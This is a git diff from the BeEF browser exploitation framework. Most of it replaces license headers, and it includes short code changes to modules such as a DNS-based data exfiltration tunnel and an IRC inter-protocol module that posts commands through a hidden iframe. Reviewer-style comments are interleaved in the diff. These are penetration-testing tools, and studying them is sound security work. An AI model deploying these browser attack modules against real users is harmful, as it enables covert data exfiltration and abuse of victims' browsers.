Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb index 2b19303ed..11e364837 100644 --- a/modules/host/insecure_url_skype/module.rb +++ b/modules/host/insecure_url_skype/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Insecure_url_skype < BeEF::Core::Command diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js index 18966fc49..63509f310 100644 --- a/modules/host/iphone_tel/command.js +++ b/modules/host/iphone_tel/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'tel:<%= @tel_num %>'; diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml index d3bb15769..d9947a9cf 100644 --- a/modules/host/iphone_tel/config.yaml +++ b/modules/host/iphone_tel/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
@@ -24,7 +14,7 @@ beef: target: user_notify: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb index 2d14f1c25..d2c422a68 100644 --- a/modules/host/iphone_tel/module.rb +++ b/modules/host/iphone_tel/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iphone_tel < BeEF::Core::Command diff --git a/modules/host/physical_location/command.js b/modules/host/physical_location/command.js index 7d2c1947c..1a579d28a 100644 --- a/modules/host/physical_location/command.js +++ b/modules/host/physical_location/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if(!beef.geolocation.isGeolocationEnabled()){ diff --git a/modules/host/physical_location/config.yaml b/modules/host/physical_location/config.yaml index 704f77ffd..716fe62dd 100644 --- a/modules/host/physical_location/config.yaml +++ b/modules/host/physical_location/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/physical_location/module.rb b/modules/host/physical_location/module.rb index 82bd71e8c..ca9170a8d 100644 --- a/modules/host/physical_location/module.rb +++ b/modules/host/physical_location/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Physical_location < BeEF::Core::Command diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js index 49a0ef690..81dea2f96 100644 --- a/modules/ipec/cross_site_printing/command.js +++ b/modules/ipec/cross_site_printing/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml index 370b690bd..fca320e93 100644 --- a/modules/ipec/cross_site_printing/config.yaml +++ b/modules/ipec/cross_site_printing/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb index e74227dee..7a629f80c 100644 --- a/modules/ipec/cross_site_printing/module.rb +++ b/modules/ipec/cross_site_printing/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Cross_site_printing < BeEF::Core::Command diff --git a/modules/ipec/dns_tunnel/command.js b/modules/ipec/dns_tunnel/command.js index f2b6040fe..a41a2b4d3 100644 --- a/modules/ipec/dns_tunnel/command.js +++ b/modules/ipec/dns_tunnel/command.js 
@@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* -Poor man's omni-directional DNS tunnel in JavaScript. +Poor man's unidirectional DNS tunnel in JavaScript. The largely-untested, highly experimental first draft. How it works: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information. -A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The queries are sent in sequence however there are plans to randomize the order. +A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The segments are sent in sequence however there are plans to randomize the order. -To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. 
The final domain name used in the query is structured as follows: +To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the DNS query is structured as follows: MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN @@ -37,15 +28,10 @@ o Domain names are limited to 255 characters in length (including dots) o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains) o Subdomains are limited to 63 characters in length (including the trailing dot) -Each query is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed. - -Features: -o Does not use DNS pre-fetching - The downside is that the requests will take a while to timeout unless the DNS server is configured to reply with NXDOMAIN (ie, blackholed) for all requests. -o Encryption - Uses very weak "encryption" (XOR) and the key is transferred with the request. -o Randomization - Each segment is given a sequence id. TODO: Send segments in a random order. +Each segment is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed. Caveats: -o Omni-directional - Data can only be sent one way. +o Unidirectional - Data can only be sent one way. o Message size - Limited to messages less than 64KB in length. o Limited by JavaScript strings. Byte code needs to be converted to a compatible string before it can be sent. There's also lots of wasted space. Converting to hex would be much cleaner and would save a few bytes for each query. o Throttling - There is no throttling. The browser may only initiate x amount of simultaneous connections. The requests should be throttled to avoid hitting the cap. TODO: Introduce a wait delay between each request to partially account for this. 
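Review bot: The `@@ -37,15 +28,10 @@` hunk of modules/ipec/dns_tunnel/command.js deletes the whole "Features" list, and with it the only sentence saying that the XOR step is weak and that the key is transferred with the request. The remaining header still says the message is "XOR'd" and lists `XOR_KEY` in the name layout, so a reader can mistake it for confidentiality. In fact anyone who sees the query, for example in resolver logs, can recover the text. I would keep one line under Caveats, such as `o Obfuscation only - XOR with a key sent in the same query; the message is readable by anyone who sees the DNS request.` The comment block opens in the previous hunk and closes outside this one.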
@@ -64,7 +50,7 @@ beef.execute(function() { var domain = "<%= @domain %>"; var message = "<%= @message %>"; - beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num) } ); + beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num+' requests sent') } ); }); diff --git a/modules/ipec/dns_tunnel/config.yaml b/modules/ipec/dns_tunnel/config.yaml index 81404dbd1..e570728eb 100644 --- a/modules/ipec/dns_tunnel/config.yaml +++ b/modules/ipec/dns_tunnel/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -19,7 +9,7 @@ beef: enable: true category: "IPEC" name: "DNS Tunnel" - description: "Sends data over DNS to a server which accepts wildcard subdomains." + description: "This module sends data one way over DNS.
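Review bot: The new callback on the `beef.net.dns.send(...)` line turns the `dns_requests` value from a bare count into free text (`'dns_requests='+num+' requests sent'`), so anything that reads the field as a number would now get a string with a suffix. Whether any consumer parses it is not visible here. If the wording is only for display, a comment on that line saying so would help, e.g. `// value is display text, not a parseable count`. Separately, the unchanged lines around it place `<%= @domain %>` and `<%= @message %>` directly inside double-quoted JavaScript literals, so a quote or backslash in either value would break the generated script unless module.rb escapes it, which this hunk does not show. `msgId` and `wait` are defined above the hunk.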

A domain and message are taken as input. The message is XOR'd, url encoded, the '%' are replaced with '.' and the message is split into segments of 230 bytes. The segments are sent in sequence along with the sequence number and XOR key.

Note: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information." authors: ["bcoles"] target: working: "All" diff --git a/modules/ipec/dns_tunnel/module.rb b/modules/ipec/dns_tunnel/module.rb index 08b07aa91..cbbeade53 100644 --- a/modules/ipec/dns_tunnel/module.rb +++ b/modules/ipec/dns_tunnel/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dns_tunnel < BeEF::Core::Command diff --git a/modules/ipec/inter_protocol_imap/command.js b/modules/ipec/inter_protocol_imap/command.js index 130db0727..45201d7da 100644 --- a/modules/ipec/inter_protocol_imap/command.js +++ b/modules/ipec/inter_protocol_imap/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Inter protocol IMAP module * Ported from BeEF-0.4.0.0 by jgaliana (Original author: Wade) diff --git a/modules/ipec/inter_protocol_imap/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml index 214fa4152..4a510d116 100644 --- a/modules/ipec/inter_protocol_imap/config.yaml +++ b/modules/ipec/inter_protocol_imap/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/ipec/inter_protocol_imap/module.rb b/modules/ipec/inter_protocol_imap/module.rb index 7765a3437..c9c2787b4 100644 --- a/modules/ipec/inter_protocol_imap/module.rb +++ b/modules/ipec/inter_protocol_imap/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inter_protocol_imap < BeEF::Core::Command diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js index 47eae7975..f8d522a5b 100644 --- a/modules/ipec/inter_protocol_irc/command.js +++ b/modules/ipec/inter_protocol_irc/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Inter protocol IRC module * Developed by jgaliana 
@@ -22,34 +13,25 @@ */ beef.execute(function() { - var server = '<%= @server %>'; - var port = '<%= @port %>'; - var nick = '<%= @nick %>'; + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var nick = '<%= @nick %>'; var channel = '<%= @channel %>'; var message = '<%= @message %>'; - var target = "http://" + server + ":" + port; - var irc_commands= "NICK " + nick + "\n"; - irc_commands+= "USER " + nick + " 8 * : " + nick + " user\n"; - irc_commands+= "JOIN " + channel + "\n"; - irc_commands+= "PRIVMSG " + channel + " :" + message + "\n"; - - var iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - form.setAttribute('enctype', 'multipart/form-data'); - - var input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'data'); - input.setAttribute('value', irc_commands); - form.appendChild(input); - - iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var irc_commands = "NICK " + nick + "\n"; + irc_commands += "USER " + nick + " 8 * : " + nick + " user\n"; + irc_commands += "JOIN " + channel + "\n"; + irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n"; + // send commands + var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent"); + // clean up + cleanup = function() { + document.body.removeChild(irc_iframe); + } + setTimeout("cleanup()", 15000); + }); diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml index 1341b4b7c..d7514b9c4 100644 --- a/modules/ipec/inter_protocol_irc/config.yaml +++ b/modules/ipec/inter_protocol_irc/config.yaml 
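Review bot: `cleanup` is assigned without `var` and then invoked through the string form `setTimeout("cleanup()", 15000)`, at the end of the rewritten `beef.execute` body in modules/ipec/inter_protocol_irc/command.js. That makes it a page-wide global looked up by name when the timer fires, so it can collide with a `cleanup` defined by the host page. A second run of the module inside the 15 seconds also overwrites it, so the first `irc_iframe` is never removed and the second timer throws on an already-removed node. Passing a closure keeps the reference local and avoids evaluating a string: `setTimeout(function() { document.body.removeChild(irc_iframe); }, 15000);`.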
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb index cad8d0380..c38e447ba 100644 --- a/modules/ipec/inter_protocol_irc/module.rb +++ b/modules/ipec/inter_protocol_irc/module.rb 
@@ -1,27 +1,17 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inter_protocol_irc < BeEF::Core::Command def self.options return [ - {'name' => 'server', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, - {'name' => 'port', 'ui_label' => 'Port', 'value' => '6667'}, - {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, - {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, - {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} + {'name' => 'rhost', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, + {'name' => 'rport', 'ui_label' => 'Port', 'value' => '6667'}, + {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, + {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, + {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} ] end diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js index f8e228380..a1425f2dc 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/command.js +++ b/modules/ipec/inter_protocol_posix_bindshell/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml index 474d0940c..9e1596abe 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 063cb66d7..cfa507083 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin [+] Summary: diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js index 4d4729420..430d157e4 100644 --- a/modules/ipec/inter_protocol_win_bindshell/command.js +++ b/modules/ipec/inter_protocol_win_bindshell/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index e49666a0a..aaa438f7b 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
